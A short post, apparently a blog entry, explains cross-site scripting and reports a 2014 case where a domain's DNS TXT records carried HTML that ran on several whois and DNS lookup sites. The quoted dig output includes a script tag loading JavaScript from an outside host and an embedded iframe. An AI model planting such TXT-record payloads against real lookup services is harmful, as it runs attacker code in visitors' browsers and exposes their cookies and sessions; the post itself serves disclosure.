XSS (Cross-Site Scripting) attack is a type of injection, in which malicious scripts are injected into trusted web sites. Your browser has no way to know that the script should not be trusted, and will execute the script. In this case, the script can access any cookies, session tokens, or other sensitive information which can be passed to the attacker.
The golden rule “Do not trust user input” seems forgotten in some cases. The guy succeeded to inject malicious script via TXT record on his domain and the script is promptly executed when you check his domain via Whois services.
The vulnerable sites:
http://who.is/
http://mxtoolbox.com/
http://dig.whois.com.au/
…
Some of them are already patched but the taste remains 🙂
The ycombinator discussion: https://news.ycombinator.com/item?id=8336025
The exact TXT content:
comp@comp ~ $ dig txt jamiehankins.co.uk ; <<>> DiG 9.9.5-3-Ubuntu <<>> txt jamiehankins.co.uk ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 24931 ;; flags: qr rd ra; QUERY: 1, ANSWER: 4, AUTHORITY: 2, ADDITIONAL: 3 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 4096 ;; QUESTION SECTION: ;jamiehankins.co.uk. IN TXT ;; ANSWER SECTION: jamiehankins.co.uk. 300 IN TXT "google-site-verification=nZUP4BagJAjQZO6AImXyzJZBXBf9s1FbDZr8pzNLTCI" jamiehankins.co.uk. 300 IN TXT "<iframe width='420' height='315' src='//www.youtube.com/embed/dQw4w9WgXcQ?autoplay=0' frameborder='0' allowfullscreen></iframe>" jamiehankins.co.uk. 300 IN TXT "v=spf1 include:spf.mandrillapp.com ?all" jamiehankins.co.uk. 300 IN TXT "<script src='//peniscorp.com/topkek.js'></script>" ;; AUTHORITY SECTION: jamiehankins.co.uk. 172800 IN NS hank.ns.cloudflare.com. jamiehankins.co.uk. 172800 IN NS lucy.ns.cloudflare.com. ;; ADDITIONAL SECTION: hank.ns.cloudflare.com. 11832 IN A 173.245.59.116 hank.ns.cloudflare.com. 11832 IN AAAA 2400:cb00:2049:1::adf5:3b74 ;; Query time: 81 msec ;; SERVER: 127.0.1.1#53(127.0.1.1) ;; WHEN: Thu Sep 18 23:21:30 CEST 2014 ;; MSG SIZE rcvd: 481 |